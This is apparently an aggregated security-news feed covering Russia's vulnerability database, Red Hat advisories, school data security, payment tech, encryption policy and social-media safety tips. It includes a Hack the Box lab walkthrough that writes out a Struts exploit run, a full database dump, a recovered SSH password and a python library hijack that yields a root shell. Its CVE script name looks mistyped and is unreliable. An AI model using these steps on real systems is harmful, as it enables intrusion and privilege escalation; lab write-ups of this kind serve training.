Yeah, so this was really interesting, I think. What we did is, we tried to apply one of the same techniques we used with the U.S. and Chinese research, which was to identify vulnerabilities exploited by each country’s APTs or certain groups, and to determine how many of those were reported by each country’s vulnerability database, and try to figure out what that means. So, for China, for example, very few of their vulnerabilities were reported in a timely manner by CNNVD. And during that publication line, we discovered in a number of cases that there were Chinese APTs actually exploiting those vulnerabilities in their own operations.

For Russia, interestingly enough, it was the complete opposite. So in this case, we identified 49 vulnerabilities that Russian threat groups were actively exploiting. And among those, 49, 30, or 61 percent were actually published in the BDU, so that’s substantially higher than China. Among those 30 that were published, which is well over half, APT 28, which is attributed to Russia’s main intelligence director, or the GRU, was published in the BDU. That’s a substantial amount, and it amounts to FSTEC publishing 60 percent of vulnerabilities being actively exploited by the Russian military.

In this case, we think that there are two fundamental reasons for that. The first could be that, since FSTEC’s mission is to protect Russian government information systems, the Russian government systems also utilize these programs because they’re very widely used software and hardware vulnerabilities. So the same vulnerabilities that Russian APTs are exploiting are also present on Russian information systems, and they’re using the BDU to patch them and clean them up.

The second is — which I think is also likely — that military intelligence services are obligated to protect Russian information systems with the knowledge that they possess on vulnerabilities, in addition to their offensive cyber operations. They have a dual mandate. In this case, our assessment that the GRU, for example, has this dual mandate for one, obviously, to use cyber operations to conduct intelligence operations and collect information on foreign intelligence targets abroad, and second, for this information security and defense mission in which they’re also obligated to use the information and the knowledge that they have about offensive operations to protect the Russian government information systems.

But I think that’s not the most likely scenario that we see. What you can learn from the BDU database, is that one, what kind of information systems and technologies are in Russian government, but two, that the GRU also has these balancing mandates, protecting Russian state and offensive cyber operations.

Dave Bittner:

Right. Saying to everybody, “Hey, this is where we’ve placed the virtual landmines, so heads
up.”

Priscilla Moriuchi:

Yeah, kind of. And that’s not entirely unusual. Many U.S. intelligence agencies also have those dual mandates. A part of them conduct foreign intelligence operations overseas and the other side conducts the defensive mission. So it wouldn’t be unusual for an intelligence service to balance those two dueling mandates.

Dave Bittner:

Now, you sort of wrap up your research here by asking the question, “Why does FSTEC publish so few vulnerabilities?” You’ve walked through some likely hypotheses, so can you take us through those?

Priscilla Moriuchi:

Sure. So, broadly, we struggled for a long time with, why put the effort in to report so few vulnerabilities? Our broad survey of — we would just be both searching the internet and also talking to some of the contacts that we knew in information security and corporate world. Nobody utilizes the BDU. It’s not a primary source for any company or any person or organization. So, we just kind of struggled with, why does Russia even devote the resources to publishing this meager amount, this 10 percent that they do? So, we came up with three hypotheses and we scratched off two.

So, our first one was that FSTEC is just vastly under-resourced, and it only has the ability to focus on very key technologies that Russian users utilize. So, the hypothesis there is, they’re all under-resourced and overworked, and they can’t possibly do everything. We ended up crossing that one off the list because its own documents say that FSTEC has over 1,100 employees, and that most of those employees are responsible for this technology review and vulnerability information security mandate. That’s more than NIST, which runs the U.S. NVD, currently has. That was a hypothesis we crossed off quite quickly, because it was clear that FSTEC was not under-resourced.

The second hypothesis we tackled was that FSTEC has these dual offensive and security missions, and that it publishes similarly to China’s NVD — that it has to balance the demands of offense against the demands of defense. But in all the documentation that we review, we really found that FSTEC doesn’t have an offensive cyber mission. It’s really focused almost solely on defense, and the technology reviews are mainly secure Russian government information systems used to gain insight into these foreign technologies, not for offensive cyber mission operations.

So that left us with our last hypothesis, which was the most well supported, and that is that FSTEC is a military organization. It’s publishing just enough content in the BDU to be credible as a national vulnerability database, and FSTEC really just has a defensive mission. They’re just trying to protect Russian government information systems, and part of that is to provide this baseline for the information systems vulnerability management. The larger part of their database is simply to provide this cover right for their foreign technology inspections and their code reviews of foreign software. So unlike China’s national vulnerability database, for example, Russia does not — it doesn’t seem to — delay publication of a vulnerability so that the military can utilize it in offensive cyber operations before they publish it. We just saw no evidence to support that.

Dave Bittner:

That’s interesting. And I guess that ties into how long it takes them to publish anything.

Priscilla Moriuchi:

Right. They take a long time to publish anything, and if anything, the data actually points to the fact that Russia’s APT groups are actually utilizing vulnerabilities that are published in the BDU, not vulnerabilities that are not published in the BDU.

Dave Bittner:

Now, do any vulnerabilities show up in their database that don’t show up in the other two — the U.S. and China’s?

Priscilla Moriuchi:

Russia has a slightly different system that’s not completely analogous to the CVE numbers used by the U.S. and China. They report things by vulnerability, for example, and they have a different numbering scheme. So, it’s not 100 percent analogous. But broadly, I think there are almost no vulnerabilities in the BDU that are not in the U.S. NVD.

Dave Bittner:

So, what are the overall “take-homes” here for you? What do you walk away with in terms of being informed about how the Russians were approaching this sort of thing?

Priscilla Moriuchi:

So I think if you talk about why anyone should follow the BDU, or what we are learning here, there are a few takeaways. So, one, from an intelligence perspective, if you as a person or a company or professional are interested in what Russia is running on their own government information systems, then following the BDU gives you great insight into that.

Two, there’s a possibility that the over-reported technologies or the over-reported vendors — the technologies that Russia reports substantially more than 10 percent of — could also be the vulnerabilities that are exploited by Russian APTs, specifically the GRU and APT28. Because in that case, the data showed that over 60 percent of the vulnerabilities used by APT28 were being reported in the BDU. We don’t have a direct link that confirms that. I think it’s a moderate-confidence possibility and it’s something for defenders to be utilizing as a source of information anyway.

And third, that Russia military intelligence also have the same obligations in which they have the obligation to conduct offensive cyber operations for intelligence collection, but also, they are obligated to use their own cyber knowledge to protect Russia’s state information systems as well.

And then, lastly, that this database is being used as a cover for foreign technology reviews. As companies were seeking to sell software in Russia, you should be under no illusion of who you are dealing with. The FSTEC is the Russian military, period. The Russian military serves the interests of the Russian state, and of Russia’s national security, more broadly. Subjecting your technologies to inspection by this organization yields a number of secondary and tertiary risks to both your technology and to the potential customers and users globally.

So that’s another point that we want to foot stomp, that these technology inspections that FSTEC is broadly being used to legitimize are still run by the Russian military, and they’re not these benevolent inspections in which an entity is looking for vulnerabilities in their code. They’re requiring these inspections to get more information on these technology companies to support and protect Russia’s own government and information systems.

Dave Bittner:

Our thanks to Priscilla Moriuchi for joining us.

You can read the research that she co-wrote with Dr. Bill Ladd, also from Recorded Future. It’s titled “Pavlov’s Digital House: Russia Focuses Inward for Vulnerability Analysis.” That’s on the Recorded Future website in the blog section.

Don’t forget to sign up for the Recorded Future Cyber Daily email, where every day you’ll receive the top results for trending technical indicators that are crossing the web, cyber news, targeted industries, threat actors, exploited vulnerabilities, malware, suspicious IP addresses, and much more. You can find that at recordedfuture.com/intel.

We hope you’ve enjoyed the show and that you’ll subscribe and help spread the word among your colleagues and online. The Recorded Future podcast team includes Coordinating Producer Amanda McKeon, Executive Producer Greg Barrette. The show is produced by Pratt Street Media, with Editor John Petrik, Executive Producer Peter Kilpe, and I’m Dave Bittner.

Thanks for listening.

The post Russia’s Vulnerability Database Focuses Inward appeared first on Recorded Future.

     

IDG Contributor Network: Attacker attribution is hard, but sometimes easier than you think

The recent controversy over Hack Back, not to be confused with Back-Hack, was largely fueled by proposed but failed legislation in the State of Georgia. The spate of articles and opinion pieces arguing against the emotionally satisfying, but dangerous strategy largely hung their shields on the impossibility of getting “attribution right.”

It’s true that attackers are very good at hiding their tracks and stepping over stones making it near impossible to reach their actual source location. But there are methods and technologies that can help reveal these adversaries more accurately. I’ve personally been involved in determining attribution and holding hackers accountable based on decades of my own research.

To read this article in full, please click here

Red Hat Security Advisory 2018-2607-01

Red Hat Security Advisory 2018-2607-01 - GlusterFS is a key building block of Red Hat Gluster Storage. It is based on a stackable user-space design and can deliver exceptional performance for diverse workloads. GlusterFS aggregates various storage servers over network interconnections into one large, parallel network file system. Issues addressed include buffer overflow, denial of service, deserialization, local file inclusion, and remote file inclusion vulnerabilities.

Hack the Box: Stratosphere Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Stratosphere” which is lab presented by Hack the Box and is available online for those who want to increase their skill in penetration testing and black box testing. Stratosphereis retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: find user.txt and root.txt file in victim’s machine.

WalkThrough

Since these labs are online available therefore they have static IP. The IP of Stratosphereis 10.10.10.64

Let’s start off with scanning the network to find our target.

nmap -sV 10.10.10.64

As per nmap port 80 is open for HTTP let’s explore the target IP in the browser. After exploring port 80, we was welcomed by following page where we didn’t found any informative clue. 

After then we visit Port 8080 for HTTP proxy and here also we get same web page. We try to inspect source code of port 80 and 8080 but we got nothings.

Therefore next we decided to have directory brute force attack with help of Dirbuster and used wordlist “dictionary-list-2.3-medium.txt” for the attack.

Luckily it fetched some web directories such as /Monitoring, let’s explore it in the web browser.   

So when we try to open the URL http://10.10.10.64:8080/Monitoring then it gets redirect to http://10.10.10.64:8080/Monitoring/example/Welcome.action for login. I closely look at the URL containing .action extension, so I made Google search to extract complete information related to this extension. I found action extension is utilized by apache struts2 which has a history of bugs and vulnerabilities and if you will search for its exploit, you will get lot of python scripts and exploits to compromise this service.

So we used nmap script to identify its state of vulnerability

nmap -p8080 --script http-vuln-cve2017-563 --script-args path=/Monitoring/ 10.10.10.64

Awesome!!! It is vulnerable to cve2017-563, let’s exploit it.

I found an exploit Struts-Apache-ExploitPack , lets download it from git hub and give full permission.

git clone https://github.com/drigg3r/Struts-Apache-ExploitPack.git
cd Struts-Apache-ExploitPack
cd Exploiter
ls
chmod 777 Exploit.sh

 

Now run the following command to exploit the victim machine.

./Exploit.sh http://10.10.10.64:8080/Monitoring/example/Welcome.action
id
ls
cat db_connect
Username: admin
Password: admin

So now we have database credential, let’s utilized them for getting all information from inside the database. 

mysqldump -u admin -padmin --all-databases --skip-lock-tables

Here I found Password “9tc*rhKuG5TyXvUJOrE^5CK7k” for user Richard, now let’s try to connect with SSH using these credential.

ssh richard@10.10.10.64

Yuppie we successfully logged in victim’s machine, so now let get the user.txt and root.txt

ls
cat user.txt
cat test.py

Here we notice that test.py was computing some hash values and at the end it will give success.py from inside the root directory and whole script is depends upon hashlib. 

Then we also check sudo rights for Richard and found he has sudo right to run all type of python script. So very first we check test.py file and start solving hashes in order to get success.py

sudo /usr/bin/python /home/richard/test.py

So we got the hash value, now we need to decode it and after decoding I found “kayboo!”

On submitting the decoded text, it generated a new hash for further step and again I decode it and submit the answer and after then again a new hash and it was processing repetitively same at each time on submitting decoded text.

Since test.py was importing hashlib which was a python library so I last option was python library hijacking to escalate the root privilege.    

Therefore I create a hashlib.py script in the current directory to import system binary ‘/bin/bash’ and hence now when we will run test.py then it will import hashlib.py which will calls /bin/bash binary file.

echo 'import os;os.system("/bin/bash")' > hashlib.py
sudo /usr/bin/python /home/richard/test.py

Booom!!! Here we owned root access, now let’s get the root.txt file and finish this task.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box: Stratosphere Walkthrough appeared first on Hacking Articles.

IDG Contributor Network: Improving access certification processes makes life easier for business users. But that’s not the point

Let’s face it: Nobody looks forward to access certifications. Not the business user who has to take a big chunk of time out of an already stretched schedule to go through every single user’s access privileges and confirm whether they’re correct. Not the internal audit team that has to play the bad guy and prod the business user to quit procrastinating and get the reviews done. And certainly not the CISO, who’s ultimately responsible for the organization’s security and compliance posture—knowing that for every business user who conscientiously and painstakingly examines each user’s access, there could be another who’s just checking boxes as fast as possible (and leaving behind unmitigated risks of inappropriate access for someone to come along and exploit).  

To read this article in full, please click here

Social-Engineer Newsletter Vol 08 – Issue 108

 

Vol 08 Issue 108
September 2018

In This Issue

  • Information Security, How Well is it Being Used to Protect Our Children at School?
  • Social-Engineer News
  • Upcoming classes

As a member of the newsletter you have the option to OPT-IN for special offers. You can click here to do that.


Check out the schedule of upcoming training on Social-Engineer.com

3-4 October, 2018 Advanced Open Source Intelligence for Social Engineers – Louisville, KY (SOLD OUT)

If you want to ensure your spot on the list register now – Classes are filling up fast and early!


The SEVillage at Def Con 26 would not have been possible without it’s amazing Sponsors!

Thank you to our Sponsor for SEVillage at DerbyCon 8.0!


Do you like FREE Stuff?

How about the first chapter of ALL OF Chris Hadnagy’s Best Selling Books

If you do, you can register to get the first chapter completely free just go over to http://www.social-engineer.com to download now!


To contribute your ideas or writing send an email to contribute@social-engineer.org


If you want to listen to our past podcasts hit up our Podcasts Page and download the latest episodes.


Our good friends at CSI Tech just put their RAM ANALYSIS COURSE ONLINE – FINALLY.

The course is designed for Hi-Tech Crime Units and other digital investigators who want to leverage RAM to acquire evidence or intelligence which may be difficult or even impossible to acquire from disk. The course does not focus on the complex structures and technology behind how RAM works but rather how an investigator can extract what they need for an investigation quickly and simply

Interested in this course? Enter the code SEORG and get an amazing 15% off!
http://www.csitech.co.uk/training/online-ram-analysis-for-investigators/

You can also pre-order, CSI Tech CEO, Nick Furneaux’s new book, Investigating Cryptocurrencies: Understanding, Extracting, and Analyzing Blockchain Evidence now!


The team at Social-Engineer, LLC proudly uses:


A Special Thanks to:

The EFF for supporting freedom of speech

Keep Up With Us

Friend on Facebook Facebook
Follow on Twitter Twitter

Information Security, How Well is it Being Used to Protect Our Children at School?

Information Security, How Well is it Being Used to Protect Our Children at School?

August and September are ordinary months to some, but to others they are a time of mixed emotions. It’s the start of another school year. Some are sad to see their children off, while others celebrate that day. The start of the school year brings with it a lot of paperwork and sharing of sensitive information. How well is information security being used to protect our children’s information, and even the school staff’s, personally identifiable information (PII)? How well is it being used to protect against social engineering attacks?

Think about the information that the schools keep; when you registered your child, you may have had to give them copies of their birth certificate, social security number, your phone number, and other personal information. You may have had to give your own social security number, especially if you had to fill out an application for free and reduced-price meals, or you had to register to volunteer at the school. If your child is in a college or university, even more information has to be given such as financial records, medical records, and high school transcripts. What is being done to keep that information secure?

When I read the following headlines they make me a little concerned, how about you?

These are only a few of the many stories out there. According to the Breach Level Index by Gemalto, the education sector had 33.4 million records breached in 2017 and a total of 199 reported breaches. This is a 20% increase of reported incidents over 2016. It gives meaning as to how widespread the incidents are when I see it visually on the K-12 Cyber Incident Map by the K-12 Cybersecurity Resource Center.

Who are breaching school networks and why are they doing it

Who are trying to breach a school’s network? It’s not just the student doing it to change grades or for fun, it’s also the elite attacker and the common cybercriminal. Thanks to the ease of availability of hacking tools, and the sharing of malicious attack techniques on the dark web, they are able to install ransomware, encrypt drives, and demand payment to decrypt them. They are also able to exfiltrate PII and passwords to gain further access to networks and steal and create identities. Identity thieves will use the child’s information to create their own false identity where they can take out credit cards and loans, ruining your child’s credit. When this happens, it can make it difficult to get a license, go to college, or get any loans.

How are they doing it?

Cybercriminals are opportunists who will take advantage of any vulnerabilities, especially with organizations that are less secure. Unfortunately for educational institutions, their security stance is usually poor and at a high risk. They battle staffing and budgetary constraints, their view of cybersecurity has been one of a low priority, and they view security as an inconvenience.

Another point of weakness is the ease of accessibility to the school’s network. They usually have free Wi-fi, large numbers of desktop and mobile devices, and weak passwords which all present potential points of entry into the network. In addition, students will browse the web from insecure networks and often pick up malware which can then be inadvertently shared with others via email or uploads of coursework to the secure school network.

So, what do cybercriminals do? They use a variety of web- and email-based attacks that are at their disposal. One web-based attack is that they actively target sites where students will commonly browse. These are often completely legitimate sites, such as Thesaurus.com. No click required; just viewing the ad can initiate the malware download.

An example of an email-based (phishing) attack targeting education was at Northeastern University, where some Blackboard Learning users were targeted by an email that tried to influence the reader into clicking a link that was disguised to be legitimate and tried to compel the action by using a time constraint.

With web- and email-based attacks, the cybercriminal can deliver ransomware and steal student records. All at a great cost to the school system and to those that have their information compromised.

What can be done?

When it comes to protecting our children we are willing to do anything, so what can we do to protect our children’s information?

Here are some things that parents can do:

1. Make sure that the personal computer that is used to log into the school’s network is up-to-date;

2. Make sure that computer has more than just an antivirus installed, add malware protection as well;

3. Be proactive and educate yourself and your children on security awareness;

  • Read the Social Engineer Framework;
  • Have your child create usernames that don’t contain personal information, such as birth year;
  • Look at using a private VPN when on an insecure network, such as at Starbucks. Trustworthy VPNs will usually have a fee for using them;
  • Teach children the importance of not giving out information;
  • Use a secure password manager and don’t share passwords;
  • Make sure teens don’t take a picture of their license and share it on social media; and
  • Don’t throw important documents in the trash, shred them.

4. Be watchful of your student’s browsing activity; and

5. Something you may wish to look into is an identity theft protection service to protect your child against identity theft.

Remember that just because you are asked to give out information doesn’t mean you have to. Ask, “why is it necessary for them to have that information?”

Schools need to follow the industry best practice in information security and we, as parents, need to demand that it be done. Schools should also be forced to address the human element in security:

  • Staff, teachers, students, and parents need to be educated and used as a line of defense; and
  • Institute security awareness training which includes: Performing simulated phishing exercises; Recruiting on-campus security advocates; and Holding onsite security education activities, lectures, and in-class training.

Following these suggestions will help to protect our children’s information at school.

Need Inspiration?

If you want some inspiration, look at what some schools are doing:

  • One example is that the July 2017 article of The Educator in San Diego, CA said that, “the local ESET office runs an annual cyber boot camp for about 50 middle and high school students.”
  • Another example was in the June 2017 article of The Educator, where it discusses how the Macquarie University in Australia uses the BlackBerry AtHoc as part of the University’s Emergency Management Plan and that the system will assist the school in managing and mitigating social engineering incidents, for example, by sending a message to staff and students recommending not to open a certain email or click on a certain link.

To some, the suggestions may be easier said than done, but, if they aren’t followed, the school nearest you may be the next cybersecurity incident we read about. Information security must be implemented to protect the sensitive information (PII) that is housed at the schools, especially that of protecting our children’s information.

Stay safe and secure.

Written By: Mike Hadnagy

Sources:

https://www.theeducatoronline.com/au/news/is-your-school-protected-against-cyber-threats/237855

https://www.theeducatoronline.com/au/technology/infrastructure-and-equipment/how-malware-could-be-threatening-your-school/246146

https://edtechmagazine.com/k12/article/2016/04/how-ever-worsening-malware-attacks-threaten-student-data

https://blogs.cisco.com/education/the-surprisingly-high-cost-of-malware-in-schools-and-how-to-stop-it

https://blog.barkly.com/school-district-malware-cyber-attacks

https://in.pcmag.com/asus-zenpad-s-80-z580ca/124559/news/facebook-serves-up-internet-101-lessons-for-kids

https://www.stuff.co.nz/business/105950814/schools-promised-better-protection-from-ransomware-as-taranaki-school-blackmailed

https://www.eset.com/int/about/why-eset/

As part of the newsletter group, you will be the first to receive special offers to services and products by Social-Engineer.Com.


 

 

The post Social-Engineer Newsletter Vol 08 – Issue 108 appeared first on Security Through Education.

More Than a Quarter of Executives View Security Investments as Having a Negative ROI

According to a new digital trust report, 27 percent of business executives view security investments as having a negative return on investment (ROI).

Of these respondents, more than three-quarters said they had been involved in a publicly disclosed data breach in the past, according to “The Global State of Online Digital Trust Survey and Index 2018” by CA Technologies.

This finding led the report’s authors to conclude that “over one quarter of executives are tone deaf to modern security challenges and data breach implications, and have not learned from previous mistakes.” By comparison, just 7 percent of cybersecurity staffers said they believe security investments produce a negative ROI.

The Trickiest Metric in Security

ROI is a tricky subject in the context of information security. According to CSO Online, digital security investments don’t produce greater profits, but instead contribute to “loss prevention,” or greater savings in the event of a security incident. This suggests that increased revenues shouldn’t factor into organizations’ decisions on whether to invest in digital security.

Another CSO Online piece proposed that ROI is the wrong metric for evaluating the efficacy of a digital security program. Instead, executives and board members should focus on network defender first principles. To get to the heart of these principles, executives need to determine how network defenders should spend their time and what they hope to achieve.

How to Quantify the ROI of Security Investments

To quantify the ROI of their organizations’ security investments, chief information security officers (CISOs) should consider adopting a zero-trust approach and focusing on people, programs and technology to improve their data security posture. They should also take the lead in improving formal risk management processes that evaluate information assets and vulnerabilities.

Sources: CA Technologies, CSO Online, CSO Online(1)

The post More Than a Quarter of Executives View Security Investments as Having a Negative ROI appeared first on Security Intelligence.

New Payment Tech, New Security Challenges

There are more ways to pay for goods and services than ever before. New payment technologies bring growth opportunities for businesses, and they can revolutionize customer experiences at point-of-sale.

However, these new apps and technologies also present payment providers with new types of threats. In order to provide high-security experiences for users, security must be built into these new apps and technologies from the ground up. But there’s reason to believe that ship may have sailed.

The very architecture and developer languages chosen for the latest crop of mobile financial apps and payment solutions like Tap-To-Pay and Pin-On-Glass haven’t necessarily been chosen with security in mind. Therefore, they may have fundamental, systemic vulnerabilities open to compromise.

As smart payment technologies rose to prominence, simple mag stripe readers with virtually no security were ubiquitous among businesses for whom larger PEDs are cost-prohibitive. Luckily, more secure options have come to market since the EMV migration has begun in the United States. These options, such as downloadable mPOS and PIN-on COTS, bring more security than a simple mag stripe, but not nearly enough to meet a financial institution’s standard.

In the past, a payment terminal was a standards-compliant, extensively-researched and secured hardware device that was purpose-built for processing secure transactions. Now, any device with the necessary features can become a payment terminal. Additionally, that device handles all of the transaction processing. Naturally, these changes prompt security challenges.

Tap-To-Pay systems present a particularly novel protection trial; not only are these devices often owned and maintained by non-tech-savvy end users, but they serve numerous purposes each day. One minute a user is playing Candy Crush, and the next they’re executing and processing transactions to and from the world’s largest financial institutions—all on the same pane of glass. Historically, payment systems have segregated the transaction itself from the card’s credentials, but this is no longer the case, presenting a new structural vulnerability for fraud.

Since a smartphone will be managing on-boarding, authentication of the account, cryptographic processing and securely communicating with all involved parties, the security of the device itself is of primary importance. Yet, it is well-known that jailbroken or rooted devices exist around the world and are easily masked from detection on a network. Payment apps must cope with this reality and keep data safe even on compromised devices, so the architecture used to build these applications becomes crucially important. Some apps are only offered on certain platforms for this reason, and others are certified to meet certain standards of protection. App developers must assess platforms for their architecture and security capabilities to best protect sensitive financial data. Even root detection, the ability for an application to identify if the device is more susceptible to intrusion, depends upon an outdated blacklist/whitelist approach, and therefore, knowledge of prior attacks.

So what can a developer do to secure their user’s data in transit, in storage and in use? First off, crypto data must be able to run in a protected environment. The app’s code also needs to be protected from analysis, both static and dynamic. And furthermore, secure and authenticated access must be ensured.

Mobile devices are the most effective hacking tools available today. Used by billions and sharing standardized characteristics, smartphones aren’t able to be protected with traditional IT security techniques. Since operating systems can’t be trusted, the most notable control a developer has is over the app itself. That’s where security really begins.

About the author: Simon Blake-Wilson is Chief Operating Officer at Inside Secure, ​a global provider of security solutions for mobile and connected devices.He co-authored the book, Digital Signatures: Security and Controls, and edited several ANSI standards on Elliptic Curve Cryptography which have been adopted by the US government.

Copyright 2010 Respective Author at Infosec Island

Collection Management: a Crash-Course

Effective collection management is integral to the success of an intelligence operation. What is it and how does it work? Thomas Hofmann, the Vice President of Intelligence at Flashpoint offers a crash-course in creating an effective collection management program. Collection management is one of the most overlooked and misunderstood aspects of an...

Read the whole entry... »

Related Stories

Red Hat Security Advisory 2018-2608-01

Red Hat Security Advisory 2018-2608-01 - GlusterFS is a key building block of Red Hat Gluster Storage. It is based on a stackable user-space design and can deliver exceptional performance for diverse workloads. GlusterFS aggregates various storage servers over network interconnections into one large, parallel network file system. Issues addressed include buffer overflow, denial of service, and deserialization vulnerabilities.

Governments commit to fighting encryption, and tech companies will have to cooperate

Government officials from “Five Eyes” countries have declared war on encryption, seeing it as a threat instead of a shield. The US, UK, Australia, Canada and New Zealand are pressuring tech companies to forget about user data privacy and give them access to encrypted data, writes ZDNet.

To get more visibility into the digital space, the “Five Eyes” are now coming up with a law to back their demands. This initiative is one of the three statements the governments issued in a meeting on homeland security, immigration and safety.

According to the Statement of Principles on Access to Evidence and Encryption, “privacy is not absolute” as it could protect “serious crimes and threats to national and global security.” Such a law would be vital to protect their citizens and national security, they argue.

“Many of the same means of encryption that are being used to protect personal, commercial and government information are also being used by criminals, including child sex offenders, terrorists and organized crime groups to frustrate investigations and avoid detection and prosecution,” further states the document.

The ministers feel that, based on the principle that homes and cars can be searched, governments should gain access to private data. They expect tech companies to cooperate, or they will legally compel them to release data that is legally necessary.

In less official terms, they want tech companies to loosen up encryption and create a backdoor for government agencies to use as they please, even though this could jeopardize overall infrastructure security and expose the data to cybercriminals.

ProtonVPN review: Underground data centers, one-click multi-hop, and more make for a great choice

ProtonVPN in brief:

  • P2P allowed: Yes, on specified servers
  • Business location: Switzerland
  • Number of servers: 249
  • Number of country locations: 19
  • Cost: Free, $48, $96, or $288 per year
  • VPN protocol (default): OpenVPN
  • Data encryption: AES-256
  • Data authentication: HMAC with SHA-256
  • Handshake encryption: 2048-bit RSA

When you use a third-party VPN there’s always a certain amount of trust you have to have in your service provider. Sometimes companies make that really hard by hiding who they are or basing themselves in exotic locations. Then there are services that make trust easier—like ProtonVPN, from the creator of ProtonMail.

To read this article in full, please click here

Here Are The Essential Security Tips To Stay Safe On Social Media

When you say “social media”, the first thing that comes to mind is fun and entertainment. Social media is mostly about this.

Everyone has a social account on at least one platform. Whether it is Facebook, Twitter, Instagram or LinkedIn, we can easily stay in touch with friends and family, share memorable moments of our lives, follow experts from our professional area, or just read the news.

Social media habits may differ from one person to another, but the reality is we spend a lot of time on these networks. This is why we should ask ourselves more often:

“Do we really know how to stay safe on social media and avoid becoming easy targets for cyber criminals?”

Nowadays, privacy and security should be top priorities for us.

In this guide, you will find actionable and useful security tips to help you stay safe on social media.

You will also learn about the best security practices you need to apply to protect your most valuable data.

How to better secure your Facebook account

There’s no doubt that Facebook is one of the most used and popular social networks out there with over 2 billion people using the platform on a daily basis. Who doesn’t have a Facebook account these days?

It is the platform that helps us better connect with friends and family, and keep up with what they’re doing. But it’s also the place where we share a lot of personal information, so securing our online accounts need to be of utmost importance.

In light of the recent scandal between Cambridge Analytica and Facebook that involved a massive amount of personal information of about 50 million Facebook users, it raised lots of questions on how data is controlled and managed by this platform. I want to believe it was actually a wake-up call suggesting that privacy and security should have serious attention from us.

Follow these basic security tips so you can stay safe on the platform:

  • Do not share your password with others and make sure you always set a unique and strong one. Use this security guide that will teach you how to easily manage passwords like a pro and keep malicious actors away.
  • If you’ve logged in from a different computer/device you’ve shared with others, remember to always log out and don’t check “Keep me logged in”
  • Use two-factor authentication feature which can be activated by clicking the Setup button from Settings. Confirm this action by enabling it and re-enter your password, and then you will receive an email or a code via your mobile phone saying that two-factor authentication has been activated
  • Strongly advise you to accept friend requests from people you know in real life, or at least, verify if you have a few friends in common. There are many Facebook fake accounts used by malicious people who might spam or impersonate you
  • If you notice something suspicious on Facebook, report it immediately. You can do this here.

If you care about your data (and we know you do), make sure you got all covered in terms of security by reading this useful Facebook privacy and security guide.

Apply these security measures to better secure your Twitter account

I don’t know about you, but I am a big fan of this platform and love to tweet :-), look out for cyber security specialists and inspiring people, or read news from people and brands I follow.

Whether it’s for personal use or business reasons, this network is a great option to promote yourself, your company, as well as to reach out to someone and stay up to date with various topics you may be interested in.

We strongly recommend to apply these basic security and privacy tips to strengthen your Twitter account:

  • Always use strong and unique passwords for your Twitter account, and consider choosing a password manager to encrypt and better secure them. This rule should be followed to ensure safety for every social platform;
  • Use two-factor authentication system as a second layer of protection to enhance safety and verify your identity each time you sign in;
  • Activate the option “Protect my tweets” from Settings and Privacy -> Privacy and safety module, if you want to get some control over the info shared and who is following you;
  • Do not click on suspicious links you receive via private messages, because you could be exposed to phishing attacks used by cyber criminals or malicious persons who want to obtain your Twitter credentials or any other personal information;
  • Revise and pay attention to third-party apps that connect to your account, and implicitly have access to your personal data.
  • if you ever connect to your Twitter account from someone else’s computer, do not forget to log out and delete all the data of the browser or app.

We have a dedicated article on how you can secure your Twitter account in 10 basic steps that we recommend to check out so you can be one step ahead of scammers.


These actionable tips help me better secure my social media accounts
Click To Tweet


Privacy and security tips for your LinkedIn account

LinkedIn, the largest professional social network has more than 562 million users and is focused on bringing together professionals from all over the world. It keeps you connected with people you’ve worked or with whom you want to collaborate at some point in the future. It is also the place where you can find freelance projects, and, why not, your future dream job, could be one click or message away 🙂

Given the increase of phishing attacks which are still one of the most widespread and effective methods used by cybercriminals, it is essential to be aware of these scams on LinkedIn too. You don’t want to see your sensitive data exposed out there, right?

Follow these pro security tips to boost your LinkedIn security and privacy today and keep your data away from prying eyes:

  • Do not use generic and easy to crack passwords such as “Abcd123” or “Password123” like the Western Australian government employees did, because malicious actors can easily break them. Secure them by using a password manager that generates complex and unique passwords, and stores them in an encrypted database.
  • Choose wisely what information you share in your public profile and limit the data you make visible by reviewing and editing your sensitive data.
  • Have a look at those third-party apps you authorized to connect to your LinkedIn account because they get access to all your data. Make sure you authorize only the trusted ones and remember to deactivate those you are not using anymore.
  • Be very careful about potential phishing messages that might request sharing personal or sensitive information. Don’t! For that, you need to understand how phishing works and this in-depth guide is exactly what you are looking for.

Keep in mind that all our social accounts are very vulnerable to data privacy breaches and other malicious methods. The bad guys will always find creative ways to steal any personal information, including your valuable data from LinkedIn. Do not forget that when you share private information.

Follow these pro tips to better secure your Instagram account

Instagram is the photo and video-sharing social media network where you can explore beautiful places and images. For visual artists, it is also an excellent platform where they can share and promote their work and projects.

However, it is in our best interest to keep in mind the risks we could be exposed to when we share personal information. Especially now that it has become such a popular platform, with more than 1 billion monthly active users.

Security wise, Instagram seems to make efforts to enhance protection for its users. Recently, the company announced its plans to boost security and privacy by adding new security tools: support for third-party two-factor authentication (2FA) instead of traditional text-based 2FA, account verification and “about this account” new feature.

Besides these new security tools, here are some great tips that will help you keep your account safe:

  • Activate two-factor authentication feature as an extra layer of protection for your Instagram account. This way, you are one step ahead of cyber criminals who won’t be able to take over your account.
  • Change your passwords regularly and make sure you use strong and unique ones, so no one can break them. If you want to change it, use these simple steps.
  • Think twice before you give access to third-party apps and revoke access to those you don’t use anymore, appear suspicious or you simply can’t remember them
  • Do not share sensitive data in your photos or captions, because you don’t want to expose personal information to everyone following you on Instagram, especially, if your account is public
  • Don’t reveal your location to others and make sure the service is turned off, especially for the check-ins made at home, at work or while on a vacation.
  • Make your account private, so you can share your photos and videos with people you only approve to see them, like your friends and family.

We have an essential guide on how to secure your Instagram account and increase it, so no cyber criminals and scammers get access to it.

Security tips to keep your Snapchat account safe 

Snapchat is both a social media network and a messaging platform which is more popular among teenagers and young people. According to a new report, analysts forecast that by 2019 Snapchat will have almost 5 million regular users aged 18-24 years, half a million more than Facebook.

Bill Fisher, senior analyst at eMarketer stated:

Many younger social network users are forgoing Facebook altogether in favor of more appealing mobile-first alternatives, such as Snapchat.

Snapchat shows instant messages, photos or videos that are deleted instantly, after they’ve been viewed by all recipients, but oh, snap! “How secure is your data on this social platform?”

Here’s how you can add extra levels of security to avoid seeing your data in the hands of hackers:

  • Enable two-factor authentication feature to make the account more secure and add double security layer when logging in. You can do this using an SMS verification code or an authenticator app. Here’s how to activate it.
